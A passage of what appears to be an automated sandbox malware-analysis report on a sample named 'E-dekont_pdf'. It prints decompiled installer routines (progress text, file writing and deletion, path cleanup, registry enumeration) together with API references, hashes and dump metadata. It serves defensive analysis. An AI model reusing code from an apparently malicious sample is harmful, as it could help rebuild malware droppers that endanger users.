					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t11 = E00403012();
					_t19 = L"unpacking data: %d%%";
					if( *0x470270 == 0) {
						_t19 = L"verifying installer: %d%%";
					}
					wsprintfW( &_v132, _t19, _t11);
					SetWindowTextW(_a4,  &_v132);
					SetDlgItemTextW(_a4, 0x406,  &_v132);
				}
				return 0;
			}






                                                                                              0x00402fa3
                                                                                              0x00402fb1
                                                                                              0x00402fb7
                                                                                              0x00402fb7
                                                                                              0x00402fc5
                                                                                              0x00402fc7
                                                                                              0x00402fd3
                                                                                              0x00402fd8
                                                                                              0x00402fda
                                                                                              0x00402fda
                                                                                              0x00402fe5
                                                                                              0x00402ff5
                                                                                              0x00403007
                                                                                              0x00403007
                                                                                              0x0040300f

                                                                                              APIs
                                                                                              • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402FB1
                                                                                              • wsprintfW.USER32 ref: 00402FE5
                                                                                              • SetWindowTextW.USER32(?,?), ref: 00402FF5
                                                                                              • SetDlgItemTextW.USER32(?,00000406,?), ref: 00403007
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.77084955068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.77084926247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085042770.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000561000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085727384.0000000000571000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_E-dekont_pdf.jbxd
                                                                                              Similarity
                                                                                              • API ID: Text$ItemTimerWindowwsprintf
                                                                                              • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                              • API String ID: 1451636040-1158693248
                                                                                              • Opcode ID: 122dbfa73d189dec6b584737e36c9d6329801f9922e0a46e077e2d4fb5e8edf8
                                                                                              • Instruction ID: c9ba9f1a6d93a88d7e45fda5c825515dfdbc732e58bea81489804385b4326db2
                                                                                              • Opcode Fuzzy Hash: 122dbfa73d189dec6b584737e36c9d6329801f9922e0a46e077e2d4fb5e8edf8
                                                                                              • Instruction Fuzzy Hash: 52F0497050020DABEF246F60DD49BEA3B69FB00309F00803AF605B51D0DFBD99559F59
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00402950 Relevance: 9.1, APIs: 6, Instructions: 91memoryfileCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 93%
                                                                                              			E00402950(void* __ebx) {
				WCHAR* _t26;
				void* _t29;
				long _t37;
				void* _t49;
				void* _t52;
				void* _t54;
				void* _t56;
				void* _t59;
				void* _t60;
				void* _t61;

				_t49 = __ebx;
				_t52 = 0xfffffd66;
				_t26 = E00402DA6(0xfffffff0);
				_t55 = _t26;
				 *(_t61 - 0x40) = _t26;
				if(E00405FAE(_t26) == 0) {
					E00402DA6(0xffffffed);
				}
				E00406133(_t55);
				_t29 = E00406158(_t55, 0x40000000, 2);
				 *(_t61 + 8) = _t29;
				if(_t29 != 0xffffffff) {
					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
					if( *(_t61 - 0x28) != _t49) {
						_t37 =  *0x470274;
						 *(_t61 - 0x44) = _t37;
						_t54 = GlobalAlloc(0x40, _t37);
						if(_t54 != _t49) {
							E004035F8(_t49);
							E004035E2(_t54,  *(_t61 - 0x44));
							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
							 *(_t61 - 0x10) = _t59;
							if(_t59 != _t49) {
								E00403371(_t51,  *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
								while( *_t59 != _t49) {
									_t51 =  *_t59;
									_t60 = _t59 + 8;
									 *(_t61 - 0x3c) =  *_t59;
									E00406113( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
									_t59 = _t60 +  *(_t61 - 0x3c);
								}
								GlobalFree( *(_t61 - 0x10));
							}
							E0040620A( *(_t61 + 8), _t54,  *(_t61 - 0x44));
							GlobalFree(_t54);
							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
						}
					}
					_t52 = E00403371(_t51,  *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
					CloseHandle( *(_t61 + 8));
				}
				_t56 = 0xfffffff3;
				if(_t52 < _t49) {
					_t56 = 0xffffffef;
					DeleteFileW( *(_t61 - 0x40));
					 *((intOrPtr*)(_t61 - 4)) = 1;
				}
				_push(_t56);
				E00401423();
				 *0x4702e8 =  *0x4702e8 +  *((intOrPtr*)(_t61 - 4));
				return 0;
			}













                                                                                              0x00402950
                                                                                              0x00402952
                                                                                              0x00402957
                                                                                              0x0040295c
                                                                                              0x0040295f
                                                                                              0x00402969
                                                                                              0x0040296d
                                                                                              0x0040296d
                                                                                              0x00402973
                                                                                              0x00402980
                                                                                              0x00402988
                                                                                              0x0040298b
                                                                                              0x00402997
                                                                                              0x0040299a
                                                                                              0x004029a0
                                                                                              0x004029ae
                                                                                              0x004029b3
                                                                                              0x004029b7
                                                                                              0x004029ba
                                                                                              0x004029c3
                                                                                              0x004029cf
                                                                                              0x004029d3
                                                                                              0x004029d6
                                                                                              0x004029e0
                                                                                              0x004029ff
                                                                                              0x004029e7
                                                                                              0x004029ec
                                                                                              0x004029f4
                                                                                              0x004029f7
                                                                                              0x004029fc
                                                                                              0x004029fc
                                                                                              0x00402a06
                                                                                              0x00402a06
                                                                                              0x00402a13
                                                                                              0x00402a19
                                                                                              0x00402a1f
                                                                                              0x00402a1f
                                                                                              0x004029b7
                                                                                              0x00402a33
                                                                                              0x00402a35
                                                                                              0x00402a35
                                                                                              0x00402a3f
                                                                                              0x00402a40
                                                                                              0x00402a44
                                                                                              0x00402a48
                                                                                              0x00402a4e
                                                                                              0x00402a4e
                                                                                              0x00402a55
                                                                                              0x004022f1
                                                                                              0x00402c2d
                                                                                              0x00402c39

                                                                                              APIs
                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
                                                                                              • GlobalFree.KERNEL32(?), ref: 00402A06
                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00402A19
                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
                                                                                              • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.77084955068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.77084926247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085042770.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000561000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085727384.0000000000571000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_E-dekont_pdf.jbxd
                                                                                              Similarity
                                                                                              • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                              • String ID:
                                                                                              • API String ID: 2667972263-0
                                                                                              • Opcode ID: c83409ff2f1928343cd42628975e7b02fb8c09c08450e64d609eaf3a15b954ce
                                                                                              • Instruction ID: 077c8a1089876a2b69c11771c405f0c752a0dc2f655da71f113ca60978626231
                                                                                              • Opcode Fuzzy Hash: c83409ff2f1928343cd42628975e7b02fb8c09c08450e64d609eaf3a15b954ce
                                                                                              • Instruction Fuzzy Hash: 0831B172D00124BBCF216FA9CE89D9EBE79AF09364F10023AF561762E1CB794D419B58
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 6F1310C7 Relevance: 8.9, APIs: 7, Instructions: 162memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E6F1310C7(void* _a8, intOrPtr _a12, void* _a16, intOrPtr _a20) {
				signed int _v0;
				signed int _t31;
				void* _t32;
				signed int _t34;
				void* _t39;
				void* _t46;
				intOrPtr _t55;
				void* _t59;
				void* _t66;
				void* _t67;
				signed short _t70;
				void* _t71;
				void* _t78;
				signed short _t79;
				void* _t83;
				void* _t85;
				void* _t86;
				void* _t88;
				signed int _t89;
				void* _t91;
				void _t94;
				void _t95;
				void* _t96;
				void* _t98;
				void* _t100;

				 *0x6f135040 = _a8;
				 *0x6f13503c = _a16;
				 *0x6f135038 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x6f135014, E6F13132B, _t85, _t88);
				_t89 =  *0x6f135040 * 0x28;
				_v0 = _t89;
				_t96 = E6F131593();
				_a8 = _t96;
				_t86 = _t96;
				_t70 = _v0 & 0x0000ffff;
				if(_t70 != 0) {
					_t83 = 0xa;
					do {
						_t31 = _t70 & 0x0000ffff;
						_t86 = _t86 + 2;
						_t100 = _t31 - 0x66;
						if(_t100 > 0) {
							_t32 = _t31 - 0x6c;
							if(_t32 == 0) {
								goto L24;
							} else {
								_t39 = _t32 - 4;
								if(_t39 == 0) {
									goto L13;
								} else {
									_t46 = _t39;
									if(_t46 == 0) {
										goto L11;
									} else {
										goto L8;
									}
								}
							}
						} else {
							if(_t100 == 0) {
								_t78 =  *0x6f13503c;
								_t91 =  *_t78;
								 *_t78 =  *_t91;
								_t79 = _v0;
								_t55 =  *((intOrPtr*)(_t79 + 0xc));
								_a12 = _t55;
								if( *((intOrPtr*)(_t91 + 4)) == 0x2691) {
									E6F13132E(_t79, _t91 + 8, 0x38);
									_t79 = _v0;
									_t98 = _t98 + 0xc;
									_t55 = _a12;
								}
								 *((intOrPtr*)(_t79 + 0xc)) = _t55;
								GlobalFree(_t91);
								goto L16;
							} else {
								_t59 = _t31 - 0x46;
								if(_t59 == 0) {
									_t95 = GlobalAlloc(0x40, 8 +  *0x6f135040 * 2);
									 *((intOrPtr*)(_t95 + 4)) = 0x2691;
									_t15 = _t95 + 8; // 0x8
									E6F13132E(_t15, _v0, 0x38);
									 *_t95 =  *( *0x6f13503c);
									 *( *0x6f13503c) = _t95;
									goto L15;
								} else {
									_t66 = _t59 - 6;
									if(_t66 == 0) {
										L24:
										_t33 =  *0x6f135010;
										if( *0x6f135010 != 0) {
											E6F13132E( *0x6f135038, _t33 + 4, _t89);
											_t71 =  *0x6f135010;
											_t98 = _t98 + 0xc;
											 *0x6f135010 =  *_t71;
											GlobalFree(_t71);
											goto L26;
										}
									} else {
										_t67 = _t66 - 4;
										if(_t67 == 0) {
											 *_t86 =  *_t86 + _t83;
											L13:
											GlobalFree(E6F1315EB(E6F131548(( *_t86 & 0x0000ffff) - 0x30)));
											_t86 = _t86 + 2;
											goto L26;
										} else {
											_t46 = _t67;
											if(_t46 == 0) {
												 *_t86 =  *_t86 + _t83;
												L11:
												GlobalFree(E6F131638(( *_t86 & 0x0000ffff) - 0x30, E6F131593()));
												_t86 = _t86 + 2;
												goto L16;
											} else {
												L8:
												if(_t46 == 1) {
													_t94 = GlobalAlloc(0x40, _t89 + 4);
													_t11 = _t94 + 4; // 0x4
													E6F13132E(_t11,  *0x6f135038, _v0);
													 *_t94 =  *0x6f135010;
													 *0x6f135010 = _t94;
													L15:
													_t98 = _t98 + 0xc;
													L16:
													_t89 = _v0;
													L26:
													_t83 = 0xa;
												}
											}
										}
									}
								}
							}
						}
						_t34 =  *_t86 & 0x0000ffff;
						_t70 = _t34;
					} while (_t34 != 0);
					_t96 = _a8;
				}
				return GlobalFree(_t96);
			}




























                                                                                              0x6f1310cd
                                                                                              0x6f1310d7
                                                                                              0x6f1310e1
                                                                                              0x6f1310f5
                                                                                              0x6f1310f8
                                                                                              0x6f1310ff
                                                                                              0x6f13110e
                                                                                              0x6f131110
                                                                                              0x6f131114
                                                                                              0x6f131116
                                                                                              0x6f13111d
                                                                                              0x6f131129
                                                                                              0x6f13112a
                                                                                              0x6f13112a
                                                                                              0x6f13112d
                                                                                              0x6f131130
                                                                                              0x6f131133
                                                                                              0x6f131260
                                                                                              0x6f131263
                                                                                              0x00000000
                                                                                              0x6f131265
                                                                                              0x6f131265
                                                                                              0x6f131268
                                                                                              0x00000000
                                                                                              0x6f13126e
                                                                                              0x6f13126f
                                                                                              0x6f131272
                                                                                              0x00000000
                                                                                              0x6f131278
                                                                                              0x00000000
                                                                                              0x6f131278
                                                                                              0x6f131272
                                                                                              0x6f131268
                                                                                              0x6f131139
                                                                                              0x6f131139
                                                                                              0x6f131221
                                                                                              0x6f13122c
                                                                                              0x6f131230
                                                                                              0x6f131232
                                                                                              0x6f131235
                                                                                              0x6f131238
                                                                                              0x6f131240
                                                                                              0x6f131249
                                                                                              0x6f13124e
                                                                                              0x6f131251
                                                                                              0x6f131254
                                                                                              0x6f131254
                                                                                              0x6f131259
                                                                                              0x6f13125c
                                                                                              0x00000000
                                                                                              0x6f13113f
                                                                                              0x6f13113f
                                                                                              0x6f131142
                                                                                              0x6f1311ec
                                                                                              0x6f1311f5
                                                                                              0x6f1311f8
                                                                                              0x6f1311ff
                                                                                              0x6f13120c
                                                                                              0x6f131213
                                                                                              0x00000000
                                                                                              0x6f131148
                                                                                              0x6f131148
                                                                                              0x6f13114b
                                                                                              0x6f13127d
                                                                                              0x6f13127d
                                                                                              0x6f131284
                                                                                              0x6f131291
                                                                                              0x6f131296
                                                                                              0x6f13129c
                                                                                              0x6f1312a2
                                                                                              0x6f1312a7
                                                                                              0x00000000
                                                                                              0x6f1312a7
                                                                                              0x6f131151
                                                                                              0x6f131151
                                                                                              0x6f131154
                                                                                              0x6f1311b5
                                                                                              0x6f1311b8
                                                                                              0x6f1311cd
                                                                                              0x6f1311cf
                                                                                              0x00000000
                                                                                              0x6f131156
                                                                                              0x6f131157
                                                                                              0x6f13115a
                                                                                              0x6f131196
                                                                                              0x6f131199
                                                                                              0x6f1311ae
                                                                                              0x6f1311b0
                                                                                              0x00000000
                                                                                              0x6f13115c
                                                                                              0x6f13115c
                                                                                              0x6f13115f
                                                                                              0x6f131175
                                                                                              0x6f13117d
                                                                                              0x6f131181
                                                                                              0x6f13118c
                                                                                              0x6f13118e
                                                                                              0x6f131215
                                                                                              0x6f131215
                                                                                              0x6f131218
                                                                                              0x6f131218
                                                                                              0x6f1312a9
                                                                                              0x6f1312ab
                                                                                              0x6f1312ab
                                                                                              0x6f13115f
                                                                                              0x6f13115a
                                                                                              0x6f131154
                                                                                              0x6f13114b
                                                                                              0x6f131142
                                                                                              0x6f131139
                                                                                              0x6f1312ac
                                                                                              0x6f1312af
                                                                                              0x6f1312b1
                                                                                              0x6f1312ba
                                                                                              0x6f1312ba
                                                                                              0x6f1312c5

                                                                                              APIs
                                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 6F13116B
                                                                                              • GlobalFree.KERNEL32(00000000), ref: 6F1311AE
                                                                                              • GlobalFree.KERNEL32(00000000), ref: 6F1311CD
                                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 6F1311E6
                                                                                              • GlobalFree.KERNEL32 ref: 6F13125C
                                                                                              • GlobalFree.KERNEL32(?), ref: 6F1312A7
                                                                                              • GlobalFree.KERNEL32(00000000), ref: 6F1312BF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.77216589547.000000006F131000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F130000, based on PE: true
                                                                                              • Associated: 00000001.00000002.77216556616.000000006F130000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77216631683.000000006F134000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77216670009.000000006F136000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_6f130000_E-dekont_pdf.jbxd
                                                                                              Similarity
                                                                                              • API ID: Global$Free$Alloc
                                                                                              • String ID:
                                                                                              • API String ID: 1780285237-0
                                                                                              • Opcode ID: f46fe450e3b23f125da41ae1bc962cc3f90f60fa9f459d5dff5ea7a6c6c7d420
                                                                                              • Instruction ID: 38f98c64b752e81795f44d8f1c3d40e3683fd6552797b39c5d0c36ac29e2573b
                                                                                              • Opcode Fuzzy Hash: f46fe450e3b23f125da41ae1bc962cc3f90f60fa9f459d5dff5ea7a6c6c7d420
                                                                                              • Instruction Fuzzy Hash: E751B177E007229FDB20CF79C940AAA77A4FF5A7A4B10452EF944E7250D736E921CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00404E71 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 77%
                                                                                              			E00404E71(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v68;
				char _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				signed int _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t44;
				signed int _t46;
				signed int _t50;
				signed int _t52;
				signed int _t53;
				signed int _t55;

				_t23 = _a16;
				_t53 = _a12;
				_t44 = 0xffffffdc;
				if(_t23 == 0) {
					_push(0x14);
					_pop(0);
					_t24 = _t53;
					if(_t53 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t44 = 0xffffffdd;
					}
					if(_t53 < 0x400) {
						_t44 = 0xffffffde;
					}
					if(_t53 < 0xffff3333) {
						_t52 = 0x14;
						asm("cdq");
						_t24 = 1 / _t52 + _t53;
					}
					_t25 = _t24 & 0x00ffffff;
					_t55 = _t24 >> 0;
					_t46 = 0xa;
					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
				} else {
					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
					_t50 = 0;
				}
				_t31 = E004066A5(_t44, _t50, _t55,  &_v68, 0xffffffdf);
				_t33 = E004066A5(_t44, _t50, _t55,  &_v132, _t44);
				_t34 = E004066A5(_t44, _t50, 0x446748, 0x446748, _a8);
				wsprintfW(_t34 + lstrlenW(0x446748) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
				return SetDlgItemTextW( *0x468238, _a4, 0x446748);
			}



















                                                                                              0x00404e7a
                                                                                              0x00404e7f
                                                                                              0x00404e87
                                                                                              0x00404e88
                                                                                              0x00404e95
                                                                                              0x00404e9d
                                                                                              0x00404e9e
                                                                                              0x00404ea0
                                                                                              0x00404ea2
                                                                                              0x00404ea4
                                                                                              0x00404ea7
                                                                                              0x00404ea7
                                                                                              0x00404eae
                                                                                              0x00404eb4
                                                                                              0x00404eb4
                                                                                              0x00404ebb
                                                                                              0x00404ec2
                                                                                              0x00404ec5
                                                                                              0x00404ec8
                                                                                              0x00404ec8
                                                                                              0x00404ecc
                                                                                              0x00404edc
                                                                                              0x00404ede
                                                                                              0x00404ee1
                                                                                              0x00404e8a
                                                                                              0x00404e8a
                                                                                              0x00404e91
                                                                                              0x00404e91
                                                                                              0x00404ee9
                                                                                              0x00404ef4
                                                                                              0x00404f0a
                                                                                              0x00404f1b
                                                                                              0x00404f37

                                                                                              APIs
                                                                                              • lstrlenW.KERNEL32(00446748,00446748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F12
                                                                                              • wsprintfW.USER32 ref: 00404F1B
                                                                                              • SetDlgItemTextW.USER32(?,00446748), ref: 00404F2E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.77084955068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.77084926247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085042770.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000561000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085727384.0000000000571000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_E-dekont_pdf.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemTextlstrlenwsprintf
                                                                                              • String ID: %u.%u%s%s$HgD
                                                                                              • API String ID: 3540041739-1438095033
                                                                                              • Opcode ID: dd91c97f61e0edca442968ff0a547df02f516e974e5ee7bfc946f90f446ecad6
                                                                                              • Instruction ID: 9ed9f44d4dfc92f2d82021de947587b6db985542d3d956de1549965f0cce5e41
                                                                                              • Opcode Fuzzy Hash: dd91c97f61e0edca442968ff0a547df02f516e974e5ee7bfc946f90f446ecad6
                                                                                              • Instruction Fuzzy Hash: F611EB735041283BEB00A5ADDC45E9F3298EB81338F150637FA26F71D1EA7DC82182D8
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004068EF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 91%
                                                                                              			E004068EF(WCHAR* _a4) {
				short _t5;
				short _t7;
				WCHAR* _t19;
				WCHAR* _t20;
				WCHAR* _t21;

				_t20 = _a4;
				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
					_t20 =  &(_t20[4]);
				}
				if( *_t20 != 0 && E00405FAE(_t20) != 0) {
					_t20 =  &(_t20[2]);
				}
				_t5 =  *_t20;
				_t21 = _t20;
				_t19 = _t20;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((short*)(E00405F64(L"*?|<>/\":", _t5))) == 0) {
							E00406113(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
							_t19 = CharNextW(_t19);
						}
						_t20 = CharNextW(_t20);
						_t5 =  *_t20;
					} while (_t5 != 0);
				}
				 *_t19 =  *_t19 & 0x00000000;
				while(1) {
					_push(_t19);
					_push(_t21);
					_t19 = CharPrevW();
					_t7 =  *_t19;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t19 =  *_t19 & 0x00000000;
					if(_t21 < _t19) {
						continue;
					}
					break;
				}
				return _t7;
			}








                                                                                              0x004068f1
                                                                                              0x004068fa
                                                                                              0x00406911
                                                                                              0x00406911
                                                                                              0x00406918
                                                                                              0x00406924
                                                                                              0x00406924
                                                                                              0x00406927
                                                                                              0x0040692a
                                                                                              0x0040692f
                                                                                              0x00406931
                                                                                              0x0040693a
                                                                                              0x0040693e
                                                                                              0x0040695b
                                                                                              0x00406963
                                                                                              0x00406963
                                                                                              0x00406968
                                                                                              0x0040696a
                                                                                              0x0040696d
                                                                                              0x00406972
                                                                                              0x00406973
                                                                                              0x00406977
                                                                                              0x00406977
                                                                                              0x00406978
                                                                                              0x0040697f
                                                                                              0x00406981
                                                                                              0x00406988
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406990
                                                                                              0x00406996
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406996
                                                                                              0x0040699b

                                                                                              APIs
                                                                                              • CharNextW.USER32(?,*?|<>/":,00000000,00000000,763F3420,004D5000,?,0040361B,004D5000,004D5000,00403923), ref: 00406952
                                                                                              • CharNextW.USER32(?,?,?,00000000,?,0040361B,004D5000,004D5000,00403923), ref: 00406961
                                                                                              • CharNextW.USER32(?,00000000,763F3420,004D5000,?,0040361B,004D5000,004D5000,00403923), ref: 00406966
                                                                                              • CharPrevW.USER32(?,?,763F3420,004D5000,?,0040361B,004D5000,004D5000,00403923), ref: 00406979
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.77084955068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.77084926247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085042770.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000561000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085727384.0000000000571000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_E-dekont_pdf.jbxd
                                                                                              Similarity
                                                                                              • API ID: Char$Next$Prev
                                                                                              • String ID: *?|<>/":
                                                                                              • API String ID: 589700163-165019052
                                                                                              • Opcode ID: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
                                                                                              • Instruction ID: d28fb8c2eefe6f61a155ceb01790bbf8b21f4710aa7989e54d8eeb8481a577c9
                                                                                              • Opcode Fuzzy Hash: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
                                                                                              • Instruction Fuzzy Hash: 2611089580061295DB303B18CC40BB762F8AF99B50F12403FE98A776C1E77C4C9286BD
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00402EA9 Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 48%
                                                                                              			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
				void* _v8;
				int _v12;
				short _v536;
				void* _t27;
				signed int _t33;
				intOrPtr* _t35;
				signed int _t45;
				signed int _t46;
				signed int _t47;

				_t46 = _a12;
				_t47 = _t46 & 0x00000300;
				_t45 = _t46 & 0x00000001;
				_t27 = E004064D5(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
				if(_t27 == 0) {
					if((_a12 & 0x00000002) == 0) {
						L3:
						_push(0x105);
						_push( &_v536);
						_push(0);
						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
							__eflags = _t45;
							if(__eflags != 0) {
								L10:
								RegCloseKey(_v8);
								return 0x3eb;
							}
							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
